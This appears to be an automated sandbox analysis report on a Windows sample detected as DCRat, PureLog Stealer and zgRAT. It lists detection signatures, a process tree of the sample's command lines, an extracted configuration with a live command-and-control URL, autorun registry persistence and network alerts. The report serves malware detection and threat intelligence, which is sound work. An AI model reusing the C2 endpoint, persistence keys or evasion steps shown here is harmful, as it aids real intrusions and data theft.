Edit tour

Windows Analysis Report
VIyu4dC9CU.exe

Overview

General Information

Sample name:	VIyu4dC9CU.exe renamed because original name is a hash value
Original sample name:	54eff01605da5e7cbdb382c98ece2c2a.exe
Analysis ID:	1589323
MD5:	54eff01605da5e7cbdb382c98ece2c2a
SHA1:	be2ecfc24603a5e282bdfbb7780a03c1410879b8
SHA256:	26bda6e083db3a3c3ccaf29434850d91bbb9e10c48886a6f6a06bbf6c183448d
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Unusual Parent Process For Cmd.EXE

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

VIyu4dC9CU.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\VIyu4dC9CU.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

csc.exe (PID: 7568 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES4065.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 7820 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7872 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES42D6.tmp" "c:\Windows\System32\CSCF1A5C7715E64605B8685523D04CDF88.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7984 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CS5lFm0nOf.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8036 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 8052 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

ctfmon.exe (PID: 4828 cmdline: "C:\Recovery\ctfmon.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cmd.exe (PID: 3180 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7584 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7620 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

ctfmon.exe (PID: 7308 cmdline: "C:\Recovery\ctfmon.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

sppsvc.exe (PID: 7448 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)

sppsvc.exe (PID: 5260 cmdline: "C:\Program Files (x86)\reference assemblies\sppsvc.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cmd.exe (PID: 7596 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\reference assemblies\sppsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sppsvc.exe (PID: 7872 cmdline: "C:\Program Files (x86)\reference assemblies\sppsvc.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cmd.exe (PID: 7276 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7928 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7944 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

sppsvc.exe (PID: 8028 cmdline: "C:\Program Files (x86)\reference assemblies\sppsvc.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

TDdwNhXdQzDImnznNSm.exe (PID: 7960 cmdline: "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cmd.exe (PID: 7376 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TDdwNhXdQzDImnznNSm.exe (PID: 576 cmdline: "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

ctfmon.exe (PID: 7992 cmdline: "C:\Recovery\ctfmon.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

VIyu4dC9CU.exe (PID: 3268 cmdline: "C:\Users\user\Desktop\VIyu4dC9CU.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cmd.exe (PID: 2092 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\Desktop\VIyu4dC9CU.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

VIyu4dC9CU.exe (PID: 2964 cmdline: C:\Users\user\Desktop\VIyu4dC9CU.exe MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cmd.exe (PID: 6720 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7z2CYqkT7L.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5256 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7588 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

sppsvc.exe (PID: 6204 cmdline: "C:\Program Files (x86)\reference assemblies\sppsvc.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cmd.exe (PID: 5204 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\reference assemblies\sppsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sppsvc.exe (PID: 3540 cmdline: "C:\Program Files (x86)\reference assemblies\sppsvc.exe" MD5: 54EFF01605DA5E7CBDB382C98ECE2C2A)

cmd.exe (PID: 7996 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7552 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://480344cm.renyash.ru/lineSecureUpdateprocessdefaultTestPublicUploadsTemporary", "MUTEX": "DCR_MUTEX-9i5llWSDsSpUTw8pYfrW", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
VIyu4dC9CU.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
VIyu4dC9CU.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\ctfmon.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\ctfmon.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1241305685.0000000000F92000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1299899215.000000001352C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: VIyu4dC9CU.exe PID: 7256	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ctfmon.exe PID: 4828	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ctfmon.exe PID: 7308	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.VIyu4dC9CU.exe.f90000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.VIyu4dC9CU.exe.f90000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7820, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\reference assemblies\sppsvc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VIyu4dC9CU.exe, ProcessId: 7256, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\reference assemblies\sppsvc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VIyu4dC9CU.exe, ProcessId: 7256, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\VIyu4dC9CU.exe", ParentImage: C:\Users\user\Desktop\VIyu4dC9CU.exe, ParentProcessId: 7256, ParentProcessName: VIyu4dC9CU.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline", ProcessId: 7568, ProcessName: csc.exe

Sigma detected: Unusual Parent Process For Cmd.EXE

Source: Process started

Author: Tim Rauch: Data: Command: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat" , CommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Recovery\ctfmon.exe" , ParentImage: C:\Recovery\ctfmon.exe, ParentProcessId: 4828, ParentProcessName: ctfmon.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat" , ProcessId: 3180, ProcessName: cmd.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES4065.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES4065.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7568, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES4065.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP", ProcessId: 7620, ProcessName: cvtres.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\VIyu4dC9CU.exe, ProcessId: 7256, TargetFilename: C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\VIyu4dC9CU.exe", ParentImage: C:\Users\user\Desktop\VIyu4dC9CU.exe, ParentProcessId: 7256, ParentProcessName: VIyu4dC9CU.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline", ProcessId: 7568, ProcessName: csc.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T01:07:16.895856+0100	2048095	1	A Network Trojan was detected	192.168.2.7	49744	172.67.220.198	80	TCP
2025-01-12T01:07:23.489578+0100	2048095	1	A Network Trojan was detected	192.168.2.7	49785	172.67.220.198	80	TCP
2025-01-12T01:07:48.739706+0100	2048095	1	A Network Trojan was detected	192.168.2.7	49919	172.67.220.198	80	TCP
2025-01-12T01:07:57.239784+0100	2048095	1	A Network Trojan was detected	192.168.2.7	49961	172.67.220.198	80	TCP
2025-01-12T01:08:01.739768+0100	2048095	1	A Network Trojan was detected	192.168.2.7	49974	172.67.220.198	80	TCP
2025-01-12T01:08:28.346607+0100	2048095	1	A Network Trojan was detected	192.168.2.7	49975	172.67.220.198	80	TCP
2025-01-12T01:08:36.802357+0100	2048095	1	A Network Trojan was detected	192.168.2.7	49976	172.67.220.198	80	TCP
2025-01-12T01:09:01.161834+0100	2048095	1	A Network Trojan was detected	192.168.2.7	49977	172.67.220.198	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: VIyu4dC9CU.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://480344cm.renyash.ru/lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php	Avira URL Cloud: Label: malware
Source: http://480344cm.renyash.ru	Avira URL Cloud: Label: malware
Source: http://480344cm.renyash.ru/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\7z2CYqkT7L.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\AOCihfsW.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\DhgBcIwD.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\BeMjthTj.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\ctfmon.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\CS5lFm0nOf.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 00000000.00000002.1299899215.000000001352C000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://480344cm.renyash.ru/lineSecureUpdateprocessdefaultTestPublicUploadsTemporary", "MUTEX": "DCR_MUTEX-9i5llWSDsSpUTw8pYfrW", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Google\Chrome\TDdwNhXdQzDImnznNSm.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Sidebar\Gadgets\TDdwNhXdQzDImnznNSm.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\ctfmon.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\AOCihfsW.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\BeMjthTj.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\DhgBcIwD.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\DtUIufbH.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\EfqhSByg.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\FUcZRGSD.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\HpEyVDEi.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\IFwiuxEU.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\IuPYVmtj.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\MbnYeHgo.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\MegGnYKL.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\MwnZBuEN.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\NJzXBuON.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\OsAnoSoB.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\QKWXiCZs.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\UpgEQnOA.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\XYvNpROm.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\aGreoIOy.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\bbEWzzMV.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\eIOeVPZc.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\eTxcBbyX.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\fdKvAzJi.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\gHPdZtTT.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\gmTMvKjO.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\jLivJUwn.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\kEMLjtbD.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\koiTwEAQ.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\kxFTgqTN.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\lHNctDZP.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\mwFSlUNE.log	ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\nRXThXRl.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\njHMYZdD.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\pDLUlABc.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\pRAsNhes.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\sNIJIutM.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\swusCNgs.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\vPfJpCEr.log	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: VIyu4dC9CU.exe	Virustotal: Detection: 54%			Perma Link
Source: VIyu4dC9CU.exe	ReversingLabs: Detection: 83%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\DhgBcIwD.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Joe Sandbox ML: detected
